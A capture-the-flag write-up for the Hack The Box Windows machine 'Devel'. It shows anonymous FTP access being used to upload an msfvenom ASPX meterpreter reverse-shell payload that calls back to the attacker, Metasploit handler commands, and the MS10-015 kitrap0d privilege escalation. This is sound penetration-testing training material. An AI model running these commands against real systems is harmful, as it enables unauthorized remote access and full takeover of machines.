Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • Port 21
  • Port 80
  • Foothold & Priv Esc
  1. Windows

HTB | Devel

PreviousHTB | OfficeNextHTB | Chatterbox

Last updated 8 months ago

This is a Windows box. You can find it here.

Skill Learned

  • kitrap0d (ms10-015)

NMAP

IP: 10.10.10.5

nmap -sC -sV 10.10.10.5 -Pn -T5

Port 21

anonymous login is allowed

Found files

Nothing interesting was found here

Port 80

Let's do gobuster

we found http://10.10.10.5/aspnet_client/system_web/

Foothold & Priv Esc

FTP

try putting test.txt

Since there is asp, we make a payload for reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=1234 -f aspx > devel.aspx

and put in the server via FTP

open msfconsole 
use multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost tun0 
set lport 1234 
set ExitOnSession false 
exploit -j

load the page http://10.10.10.5/devel.aspx and boom you have a session on our nc

and run use post/multi/recon/local_exploit_suggester

on trying exploit/windows/local/ms10_015_kitrap0d I got the shell

Fund user.txt

Found root.txt

nmap
ftp 10.10.10.5
ftp files
port 80
gobuster
ftp
/test.txt
msfvenom
put devel.aspx
running payload
exploit suggester
shell
user.txt
root.txt